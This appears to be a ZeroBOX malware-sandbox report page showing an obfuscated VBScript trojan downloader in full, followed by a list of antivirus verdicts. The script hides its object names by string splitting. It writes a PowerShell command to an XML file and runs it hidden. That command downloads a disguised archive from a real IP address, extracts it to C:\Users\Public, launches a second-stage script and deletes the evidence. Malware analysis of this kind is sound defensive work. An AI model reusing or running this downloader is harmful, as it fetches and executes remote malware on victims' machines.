Static | ZeroBOX
No static analysis available.
WrbYkxREnrHOxTFu = "Scr"
mXmUfcPHFHtjuYmH = "t.S"
IaBvcMjvVJOMkkGr = "el"
tntoiiQwRMhirsEf = "owe"
BvSOHWwakyBPGfya = "hel"
Set IJuEXfHdQmGGszAK = WScript.CreateObject("W"+ WrbYkxREnrHOxTFu +"ip"+ mXmUfcPHFHtjuYmH +"h"+ IaBvcMjvVJOMkkGr +"l")
AZIZTIULkRntWYqf = "<command>" & _
" <a>" & _
" <execute>Start-BitsTransfer -Source ""http://104.243.47.84:222/OONNeSeeVENFIIVeeeFiLLz.jpg"" -Destination ""C:\Users\Public\SSssssssssssfgss.zip""; Expand-Archive -Path ""C:\Users\Public\SSssssssssssfgss.zip"" -DestinationPath ""C:\Users\Public\"" -Force; Start ""C:\Users\Public\cSEnDAyONsEVEnFaaVVteX.vbs""; Remove-Item -Path ""C:\Users\Public\SSssssssssssfgss.zip"" -Force</execute>" & _
" </a>" & _
"</command>"
cPtwKDOILYHErhoF = "cr"
WVOEXznAhcsOGGTh = "pti"
QByDCDVCGKACZMMH = "ileSy"
qLzDnQMGdRbPgJUG = "emObj"
Set sIoBRFkMesGxKzCJ = CreateObject("S"+ cPtwKDOILYHErhoF +"i"+ WVOEXznAhcsOGGTh +"ng.F"+ QByDCDVCGKACZMMH +"st"+ qLzDnQMGdRbPgJUG +"ect")
Set eIsYNpGhwiSzbZhI = sIoBRFkMesGxKzCJ.CreateTextFile("C:\Users\Public\TTTTTTTTTTTTTTTTTTTTTTTyeq.xml", True)
eIsYNpGhwiSzbZhI.Write AZIZTIULkRntWYqf
eIsYNpGhwiSzbZhI.Close
IJuEXfHdQmGGszAK.Run "p"+ tntoiiQwRMhirsEf +"rs"+ BvSOHWwakyBPGfya +"l -command ""[xml]$eksdmocc = Get-Content 'C:\Users\Public\TTTTTTTTTTTTTTTTTTTTTTTyeq.xml'; $oommmmmmmmmmmmvv = $eksdmocc.command.a.execute; Invoke-Expression $oommmmmmmmmmmmvv""", 0, True
sIoBRFkMesGxKzCJ.DeleteFile "C:\Users\Public\TTTTTTTTTTTTTTTTTTTTTTTyeq.xml"
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac GT:VB.ObfDldr.31.517974B2
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec ISB.Downloader!gen48
ESET-NOD32 PowerShell/TrojanDownloader.Agent.OU
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Agent.gen
BitDefender GT:VB.ObfDldr.31.517974B2
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan GT:VB.ObfDldr.31.517974B2
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE GT:VB.ObfDldr.31.517974B2
TrendMicro Clean
FireEye GT:VB.ObfDldr.31.517974B2
Emsisoft GT:VB.ObfDldr.31.517974B2 (B)
GData GT:VB.ObfDldr.31.517974B2
Jiangmin Clean
Varist Clean
Avira Clean
MAX malware (ai score=83)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit GT:VB.ObfDldr.31.517974B2
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Script.Agent.gen
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Trojan.VBS.Agent
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.